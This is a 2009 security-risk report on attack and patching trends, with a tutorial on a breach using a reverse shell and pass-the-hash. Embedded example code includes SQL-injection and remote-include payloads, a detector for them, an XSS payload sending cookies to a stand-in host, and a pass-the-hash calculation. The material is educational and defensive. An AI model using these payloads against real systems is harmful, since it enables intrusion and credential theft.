
The Top Cyber Security Risks

Two risks dwarf all others, but organizations fail to mitigate them

Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis and tutorial by the Internet Storm Center and key SANS faculty members.

September 2009

Contents

Executive summary
Overview
Vulnerability exploitation trends
Application vulnerabilities exceed OS vulnerabilities
Web application attacks
Windows: Conficker/Downadup
Apple: QuickTime and six more
Origin and destination analysis for four key attacks
Application patching is much slower than operating system patching
Tutorial: Real-life HTTP client-side exploitation example
Step 0: Attacker places content on trusted site
Step 1: Client-side exploitation
Step 2: Establish reverse shell backdoor using HTTPS
Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot
Step 5: Pass the hash to compromise domain controller
Steps 6 and 7: Exfiltration
Zero-day vulnerability trends
Best practices in mitigation and control of the top risks
Critical Controls - As Applied to HTTP Server Threats

Executive Summary

Priority One: Client-side software that remains unpatched.

Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites (see Priority Two below for how the web sites themselves are compromised). Because visitors feel safe downloading content from trusted sites, they are easily fooled into opening documents, music and video files that exploit client-side vulnerabilities. Some exploits do not even require the user to open a document: simply accessing an infected website is all that is needed to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organization and to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words, the highest priority risk is getting less attention than the lower priority risk.

Priority Two: Internet-facing web sites that are vulnerable.

Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience.

Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms.

Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system.

Rising numbers of zero-day vulnerabilities

World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks. A large decline in the number of "PHP File Include" attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals.

Overview

Throughout the developed world, governments, defense industries, and companies in finance, power, and telecommunications are increasingly targeted by overlapping surges of cyber attacks from criminals and nation-states seeking economic or military advantage. The number of attacks is now so large and their sophistication so great, that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. Exacerbating the problem is that most organizations do not have an Internet-wide view of the attacks.

This report uses current data - covering March 2009 to August 2009 - from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit. The report's purpose is to document existing and emerging threats that pose significant risk to networks and the critical information that is generated, processed, transmitted, and stored on those networks. This report summarizes vulnerability and attack trends, focusing on those threats that have the greatest potential to negatively impact your network and your business. It identifies key elements that enable these threats and associates these key elements with security controls that can mitigate your risk.

The report's target audience is major organizations that want to ensure their defenses are up-to-date and are tuned to respond to today's newest attacks and to the most pressing vulnerabilities. Data on actual attacks comes from intrusion prevention appliances deployed by TippingPoint that protect more than 6,000 companies and government agencies. Data on vulnerabilities that remain unpatched comes from appliances and software deployed by Qualys that monitor vulnerabilities and configuration errors in more than 9,000,000 systems, scanned more than 100,000,000 times so far in 2009. The patterns in the data are vetted by the senior staff at the Internet Storm Center and by the faculty of the SANS Institute responsible for SANS programs in hacker exploits, penetration testing, and forensics. In other words, these findings reflect a fusion of data and experience never before brought together.

The report also includes a pictorial description/tutorial on how some of the most damaging current attacks actually work. One of the most important findings in cybersecurity over the past several years has been the understanding most often asserted by White House officials that "offense must inform defense." Only people who understand how attacks are carried out can be expected to be effective defenders. The tutorial shows what actually happened in a very damaging attack and is excerpted from Ed Skoudis' SANS Hacker Exploits and Incident Handling class. It is included to boost defenders' understanding of current attack techniques.

The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James King of TippingPoint with assistance from Wolfgang Kandek of Qualys, Johannes Ullrich of the Internet Storm Center, and Ed Skoudis and Rob Lee of the SANS Institute faculty.

Vulnerability Exploitation Trends

Application Vulnerabilities Exceed OS Vulnerabilities

During the last few years, the number of vulnerabilities discovered in applications has been far greater than the number discovered in operating systems. As a result, more exploitation attempts are recorded against application programs. The most "popular" applications for exploitation tend to change over time, since the rationale for targeting a particular application often depends on factors such as prevalence or the inability to patch it effectively. Given the current trend of converting trusted web sites into malicious servers, browsers and the client-side applications that browsers can invoke are consistently targeted.

Figure 1: Number of Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.

Windows: Conficker/Downadup

Attacks on Microsoft Windows operating systems were dominated by Conficker/Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS08-067. Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.

Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Figure 3: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Apple: QuickTime and Six More

Apple has released patches for many vulnerabilities in QuickTime over the past year, and QuickTime vulnerabilities account for most of the attacks launched against Apple software. Note that QuickTime runs on both Mac OS and Windows, so Windows-only environments are affected as well. The following vulnerabilities should be patched for any QuickTime installation: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957.

Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months)

Origin and Destination Analysis for Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate with the country of the attack destination. To show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such they should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two. However, the trends we see when separating this data are worth pointing out.

The SQL Injection attacks that compose this category include "SQL Injection using SELECT SQL Statement", "SQL Injection Evasion using String Functions", and "SQL Injection using Boolean Identity". The most prominent "PHP Remote File Include" attack is one that matches a very small HTTP request passing a link to another web site as a parameter and using a specific evasion technique that a number of attacks share to increase their reliability. Also of note is a very specific attack against the "Zeroboard PHP" application, the only individual application to appear among the top attacks. The final type of attack included in these statistics is one of the more popular "HTTP Connect Tunnel" attacks, which remains a staple of the Server-Side HTTP category. HTTP CONNECT tunnels are used for sending spam email via mis-configured HTTP servers.
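To make the signature categories above concrete, here is an added example (not code from the report, from TippingPoint or from its authors) that applies one simple pattern check per category to constructed HTTP request lines. The sample requests, host names and regular expressions are assumptions written for this illustration; a production IPS uses far more precise filters than these.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns applied to each URL-decoded query parameter value. They are
# illustrative approximations of the signature categories named in the text,
# not the vendor's actual filters.
SELECT_STATEMENT = re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)
STRING_FUNCTION = re.compile(r"\b(?:char|chr|concat|substring|substr)\s*\(", re.I)
# Tautologies such as "OR 1=1" or "AND 'a'='a'": the same literal on both sides.
BOOLEAN_IDENTITY = re.compile(
    r"\b(?:and|or)\s+(?P<lhs>\d+|'[^']*')\s*=\s*(?P=lhs)", re.I)
# A remote file include passes a full URL where the script expects a page name;
# attackers commonly end it with "?" so whatever the script appends becomes a
# query string on the attacker's server instead of breaking the URL.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)


def classify(request_line):
    """Return the set of signature names matched by one 'METHOD target' line."""
    method, target = request_line.split()[:2]
    hits = set()
    if method.upper() == "CONNECT":
        # CONNECT to anything but 443 (here: port 25, SMTP) is the spam-relay
        # tunnel the text describes on mis-configured HTTP servers and proxies.
        if target.rpartition(":")[2] != "443":
            hits.add("HTTP Connect Tunnel")
        return hits
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SELECT_STATEMENT.search(value):
            hits.add("SQL Injection using SELECT SQL Statement")
        if STRING_FUNCTION.search(value):
            hits.add("SQL Injection Evasion using String Functions")
        if BOOLEAN_IDENTITY.search(value):
            hits.add("SQL Injection using Boolean Identity")
        if REMOTE_URL.search(value):
            hits.add("PHP Remote File Include")
    return hits


# Constructed request lines for the demonstration (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /news.php?id=7 HTTP/1.1",
    "GET /news.php?id=7%20UNION%20SELECT%20user,pass%20FROM%20admins-- HTTP/1.1",
    "GET /news.php?id=7%20AND%201%3D1 HTTP/1.1",
    "GET /news.php?id=7%20UNION%20SELECT%20CHAR(97,100,109,105,110) HTTP/1.1",
    "GET /index.php?page=http://203.0.113.5/cmd.txt? HTTP/1.1",
    "CONNECT mail.example.org:25 HTTP/1.1",
]


def scan(lines=SAMPLE_REQUESTS):
    """Map each request line to the sorted list of signatures it matched."""
    return {line: sorted(classify(line)) for line in lines}


if __name__ == "__main__":
    for line, sigs in scan().items():
        print(f"{sigs or ['-']}  {line}")
```

The checks run on decoded parameter values rather than on the raw request, which is why the percent-encoded spaces and the `%3D` in the samples do not hide anything; a real filter has to cope with many more encodings than this.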

Looking at the breakdown by country we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5).

Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise.

An interesting spike in Server-Side HTTP attacks occurred in July 2009, due entirely to SQL Injection attacks using the SELECT statement. The data showed a massive campaign from a range of IP addresses located at a very large Internet Service Provider (ISP): a number of machines at a single colocation site that may all have been compromised through the same vulnerability because they were at the same patch level. In addition, a number of gambling sites took part in this attack, which peaked after hours on July Fourth, a major holiday in the United States.

Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally let's turn to the source of these HTTP Server-Side Attacks (Figure 7).

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude.

The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge with the United States being both the top source of and destination for SQL Injection events.

SQL Injection on the Internet can more or less be divided into two sub-categories: legitimate SQL Injection and malicious SQL Injection. Many web applications on the Internet still accept SQL fragments in request parameters as part of their normal functionality. The only difference between the two is intent: a web application that legitimately accepts injected SQL is guaranteed to be vulnerable to the tools and techniques attackers use for malicious SQL Injection. The servers that house these applications are likely to have a higher compromise rate, not only because they are known to be vulnerable, but also because defenders must distinguish legitimate injections from malicious ones before they can identify an attack.
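The "guaranteed to be vulnerable" point, as an added example rather than code from the report: a product lookup that splices the HTTP parameter into its SQL statement, beside the parameterized version, run against a constructed in-memory SQLite database. The table names, rows, the quote-blocking filter and the payloads are assumptions for this illustration; the payloads correspond to the boolean-identity, SELECT-statement and string-function-evasion categories in the attack data above.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for a web site's back end."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, public INTEGER);
        CREATE TABLE customers(id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
        INSERT INTO products VALUES (1,'widget',1),(2,'gadget',1),(3,'unreleased',0);
        INSERT INTO customers VALUES (1,'alice@example.com','4242'),(2,'bob@example.com','1881');
    """)
    return conn


def naive_filter(value):
    """A blacklist some sites rely on: reject quote characters. It is not a defense."""
    if "'" in value or '"' in value:
        raise ValueError("rejected by filter")
    return value


def lookup_vulnerable(conn, product_id):
    # The parameter is spliced into the statement, so its text is parsed as SQL.
    sql = "SELECT name FROM products WHERE public=1 AND id=" + naive_filter(product_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, product_id):
    # The parameter is bound as a value; it can never alter the statement.
    sql = "SELECT name FROM products WHERE public=1 AND id=?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


# Boolean identity: "AND id=1 OR 1=1" is true for every row, public or not.
BOOLEAN_IDENTITY = "1 OR 1=1"
# SELECT statement via UNION, pulling rows from an unrelated table.
UNION_SELECT_QUOTED = "0 UNION SELECT email || ':' || card_last4 FROM customers"
# The same exfiltration with a string function: char(58) is ':' built without
# a quote character, so the quote filter passes it through untouched.
UNION_SELECT_EVASION = "0 UNION SELECT email || char(58) || card_last4 FROM customers"


def demo():
    """Run the honest lookup and each payload through both implementations."""
    conn = make_db()
    try:
        lookup_vulnerable(conn, UNION_SELECT_QUOTED)
        filtered = "allowed"
    except ValueError as err:
        filtered = str(err)
    return {
        "honest": lookup_vulnerable(conn, "1"),
        "identity": sorted(lookup_vulnerable(conn, BOOLEAN_IDENTITY)),
        "filtered": filtered,
        "evasion": sorted(lookup_vulnerable(conn, UNION_SELECT_EVASION)),
        "bound_identity": lookup_parameterized(conn, BOOLEAN_IDENTITY),
        "bound_honest": lookup_parameterized(conn, "1"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15} {result}")
```

The bound version returns nothing for the identity payload because the whole string is compared to the integer column as one value; the blacklist, by contrast, stops only the one payload that happens to contain a quote.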

Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section.

A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August.

Figure 9: SQL Injection Attacks (last 6 months)

The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again the overwhelming destination for these events is in the United States. (Figure 10).

Figure 10: SQL Injection Attacks by Source Country (last 6 months)

In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted.

Although "PHP File Include" attacks have been popular, we have seen a notable decline in the overall number of attacks. With the exception of a major attack campaign originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March-May average.

There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring them, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, because these attacks are extremely easy to carry out and the payoff of a successful attack is enormous (arbitrary PHP code is executed on the server), attacks such as these are likely to remain popular for some time.

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources of "PHP Remote File Include" attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.

Figure 12: PHP Remote File Include Attacks by Source Country (last 6 months)

Cross-Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall into the trap of introducing XSS bugs while creating custom code that glues together the diverse web technologies so prevalent in today's Web 2.0 world. Another very common "use" of XSS is by advertisers' analytics systems: an advertiser's banner embedded in a web page is set up to reflect some JavaScript off the advertiser's HTTP server for tracking purposes. There is little risk in that case, because the site owner (usually) has full control over the page, so the request to the advertiser is not generally malicious. It is the "reflection" attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of the XSS attacks we have seen in the last six months.
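A reflection attack of the kind described above, as an added example that is not part of the report: a search page that copies the query into its response, rendered four ways, with Python's own HTML parser standing in for the browser to show which variants leave the payload as live markup. The payloads, the page template and the attacker host are constructed for this illustration.

```python
import html
from html.parser import HTMLParser

# Constructed reflected-XSS payloads. The first, reflected into a text node,
# sends the victim's cookie to an attacker-controlled host; the second targets
# an unquoted attribute and needs no angle brackets or quotes at all.
PAYLOAD = "<script>location='http://203.0.113.5/?c='+document.cookie</script>"
ATTRIBUTE_PAYLOAD = "x onmouseover=alert(document.cookie)"


def render(query, escape=False, quote_attr=False):
    """Search page that reflects the query into a text node and an attribute."""
    value = html.escape(query, quote=True) if escape else query
    attr = f'value="{value}"' if quote_attr else f"value={value}"
    return f"<p>Results for: {value}</p><input name=q {attr}>"


class LiveMarkup(HTMLParser):
    """Records what a browser would see: element names and attribute names."""

    def __init__(self):
        super().__init__()
        self.tags = set()
        self.attrs = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(name for name, _ in attrs)


def dangerous(page):
    """Script elements and on* event handlers that the page would execute."""
    parser = LiveMarkup()
    parser.feed(page)
    parser.close()
    found = {t for t in parser.tags if t == "script"}
    found |= {a for a in parser.attrs if a.startswith("on")}
    return sorted(found)


if __name__ == "__main__":
    cases = {
        "no escaping": render(PAYLOAD),
        "escaped text": render(PAYLOAD, escape=True),
        "escaped, unquoted attribute": render(ATTRIBUTE_PAYLOAD, escape=True),
        "escaped, quoted attribute": render(ATTRIBUTE_PAYLOAD, escape=True, quote_attr=True),
    }
    for name, page in cases.items():
        print(f"{name:30} executes: {dangerous(page) or 'nothing'}")
```

The third case is the one that bites developers who believe "we escape everything": html.escape only neutralizes the characters that matter inside a text node or a quoted attribute, so an unquoted attribute still lets a space start a new event-handler attribute. Escaping has to match the context the value lands in.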

Figure 13: XSS Attacks by Source Country (last 6 months)

Attacks sourced from the United States have been on a steady month-over-month decline, and the Republic of Korea has seen a 50% reduction in the last 30 days. These two trends have been offset by a sudden 20% increase in attacks from Australia over the same 30 days. The other three major players, Hong Kong, China and Taiwan, have remained stable over the past three months in this category.

Application Patching is Much Slower than Operating System Patching

Qualys scanners collect anonymized data on detected vulnerabilities to capture the changing dynamics of the vulnerability assessment field. The data documents changes such as the decline of server-side vulnerabilities and the corresponding rise of client-side vulnerabilities, both in operating system components and in applications. A Top 30 ranking is often used to see whether major changes occur among the most frequently found vulnerabilities. Here is the ranking for the first half of 2009, edited to remove irrelevant data points such as 0-day vulnerabilities.

  1. WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
  2. Sun Java Multiple Vulnerabilities (244988 and others)
  3. Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges(238905)
  4. Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
  5. Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
  6. Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
  7. Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
  8. Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
  9. Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
  10. Sun Java JDK JRE Multiple Vulnerabilities (254569)
  11. Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067)
  12. Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017)
  13. Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069)
  14. Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)
  15. Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)
  16. Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028)
  17. Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072)
  18. Adobe Flash Player Multiple Vulnerabilities (APSB07-20)
  19. Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20)
  20. Third Party CAPICOM.DLL Remote Code Execution Vulnerability
  21. Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076)
  22. Adobe Flash Player Multiple Vulnerabilities (APSB07-12)
  23. Microsoft Office Remote Code Execution Vulnerability (MS08-055)
  24. Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)
  25. Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051)
  26. Processing Font Vulnerability in JRE May Allow Elevation of Privileges(238666)
  27. Microsoft Office Could Allow Remote Code Execution (MS08-016)
  28. Adobe Acrobat/Reader "util.printf()" Buffer Overflow Vulnerability (APSB08-19)
  29. Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)
  30. Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007)

Table 1: Qualys Top 30 in H1 2009

Some of the vulnerabilities listed in the table are addressed quickly by IT administrators; vulnerabilities in the base operating system, for example, show a significant drop even in the first 15 days of their lifetime:

Figure 14: Microsoft OS Vulnerabilities

But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader are very widely installed and so expose the many systems they run on to long lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during the weekends when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly.

Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long-tail", the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.

Adobe Flash has similar problems with the application of its updates; there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007:

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its own automatic update mechanism, and the Internet Explorer (ActiveX) version must be patched in a separate step from the plugin used by other browsers. For users with more than one browser installed, it is quite easy to patch only one of the two copies and remain vulnerable without knowing it.

One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also increasingly for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.

Figure 17: Sun Java Vulnerabilities

Tutorial: Real Life HTTP Client-side Exploitation Example

This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization.

In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: Exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site

In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.

Step 0 Diagram

Step 1: Client-Side Exploitation

In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, iTunes, etc.), a document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, PowerPoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program, passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on the system. Still, the attacker can run programs with those limited user privileges.

Step 1 Diagram

Step 2: Establish Reverse Shell Backdoor Using HTTPS

In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network is concerned.

Step 2 Diagram

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

Steps 3 & 4 Diagram

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. With NTLMv1 or NTLMv2, a Windows machine authenticates network access for the Server Message Block (SMB) protocol with a challenge-response computed from the user's password hash, not from the password itself, so possession of the hash alone is sufficient to authenticate. This lets the attacker access the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, and NT hashes are not salted, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.
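Why possession of the hash is enough in Steps 4 and 5, shown as an added example (not the report's code and not a real pass-the-hash tool): the NTLMv2 challenge-response from MS-NLMP section 3.3.2, computed with only a dumped NT hash as input and verified by a target host that stores the same hash for the account. The user, domain, challenges and target information are constructed values; the NT hash constant is the widely published NT hash of the string "password", used so that the password itself never appears anywhere in the attacker-side code. NTLMv1 differs in the response calculation (DES keyed by the NT hash) but has the same property.

```python
import hashlib
import hmac
import os
import struct

# NT hash as dumped in Step 3: MD4(UTF-16LE(password)), unsalted. This is the
# published NT hash of "password"; the password string is not needed below.
DUMPED_NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")

# Constructed target info: one AV_PAIR (MsvAvNbDomainName = "ACME") + MsvAvEOL.
TARGET_INFO = b"\x02\x00\x08\x00" + "ACME".encode("utf-16-le") + b"\x00\x00\x00\x00"


def ntlmv2_key(nt_hash, user, domain):
    """NTOWFv2: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge,
                    timestamp, target_info):
    """Client side: NtChallengeResponse = NTProofStr || temp."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntlmv2_key(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


def verify_response(stored_nt_hash, user, domain, server_challenge, response):
    """Server side: recompute NTProofStr from the hash stored for the account."""
    nt_proof, temp = response[:16], response[16:]
    key = ntlmv2_key(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def pass_the_hash(attacker_hash, target_stored_hash, user="Administrator", domain="ACME",
                  server_challenge=None, client_challenge=None, timestamp=0x01D0000000000000):
    """The exchange: target issues a challenge, attacker answers with only the hash."""
    server_challenge = server_challenge or os.urandom(8)   # CHALLENGE_MESSAGE.ServerChallenge
    client_challenge = client_challenge or os.urandom(8)   # chosen by the (attacker's) client
    response = ntlmv2_response(attacker_hash, user, domain, server_challenge,
                               client_challenge, timestamp, TARGET_INFO)
    # AUTHENTICATE_MESSAGE carries the response; the target checks it as below.
    return verify_response(target_stored_hash, user, domain, server_challenge, response)


if __name__ == "__main__":
    # Step 4/5: the second host and the domain account reuse the same password,
    # hence the same unsalted NT hash, so the dumped hash authenticates there too.
    print("same hash on target:", pass_the_hash(DUMPED_NT_HASH, DUMPED_NT_HASH))
    print("different hash on target:", pass_the_hash(DUMPED_NT_HASH, bytes(16)))
```

Nothing in the attacker-side functions takes a password; the NT hash is the credential, which is why cracking it in Step 4 is unnecessary and why identical passwords on the local and domain administrator accounts in Step 5 hand the attacker the domain.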

Step 5 Diagram

Steps 6 and 7: Exfiltration

In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Zero-Day Vulnerability Trends

A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user.

